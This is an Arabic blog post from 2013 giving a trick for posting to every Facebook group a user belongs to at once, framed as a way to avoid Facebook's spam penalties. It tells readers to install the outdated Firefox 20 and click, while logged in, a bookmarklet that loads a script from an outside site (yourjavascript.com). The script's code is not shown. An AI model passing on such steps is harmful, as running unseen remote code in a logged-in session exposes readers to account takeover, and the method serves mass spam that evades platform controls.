السبت، 12 أكتوبر، 2013

لنشر في عدة مجموعات على الفيسبوك دفعة واحدة

هذا الموظوع منقول من مدونة المحترف للافادة فقط من صديقنا محمد بدر

قد توجد العديد من الحيل للنشر في عدة مجموعات على الفيسبوك دفعة واحدة ، لكن معضمها هو محضور من طرف الفيسبوك ، واغلبها قد يعرض حسابك لخطر الإقفال ، مدام ان فيسبوك تعتبر ذلك نوع من السبام الذي قد ينزل عقوبات على حسابك ، وعليه  تبقى من الطرق الاكثر أمان هي إستعمال اكواد الجاڤا سكريبت ، وذلك لسهولتها وسرعتها بالإضافة إلى انها لا تعرض حسابك للخطر كما هو الامر بالنسبة للـ Access Token  .
الحلقة809: كيف تنشر في عدة مجموعات على فيسبوك بنقرة زر واحدة

وعليه في موضوع هذه التدوينة ساقدم لك حيلة بسيطة يمكنك معها النشر في عدة مجموعات دون الخوف من تعرض حسابك للعقوبة . حيث يكفي ان تتوفر على الإصدار القديم من موزيلا فايرفوكس   Firefox 20 ويمكنك تحميله من الرابط اسفل الڤيديو ، وكذلك ان تتوفر على الكود الاتي :
javascript:(function(){document.body.appendChild(document.createElement('script')).src='http://yourjavascript.com/01351321011/s.js';})();
والذي سيمكنك من النشر في عدة مجموعات على الفيسبوك مهما بلغ عددها !

الطريقة الولى تمثل في تتبيث برنامج موزيلا فايرفوكس الإصدار الــ 20 تم بعد ذلك قم بإضافة مفضلة جديدة Bookmark إلى المتصفح ،

في إسم المفضلة إختر gppost اما في location فضع كود الجاڤاسكريبت الذي حددته في اول التدوينة ، بعد ذلك انقر على ok
.
الان قم بالدخول إلى حسابك في فيسبوك وانقر على المفضلة التي اضفتها بعد ذلك ستضهر خانة صغيرة انشر فيها ماشئت رابط موقعك او رسالة وسيتم نشرها في جميع مجموعات الفيسبوك المشترك بها ! حظ موفق :)

0 التعليقات:

إرسال تعليق

لا تنسى ان تشارك samir soltani بتعليقك
او نشر الموظوع جزاك الله خيرا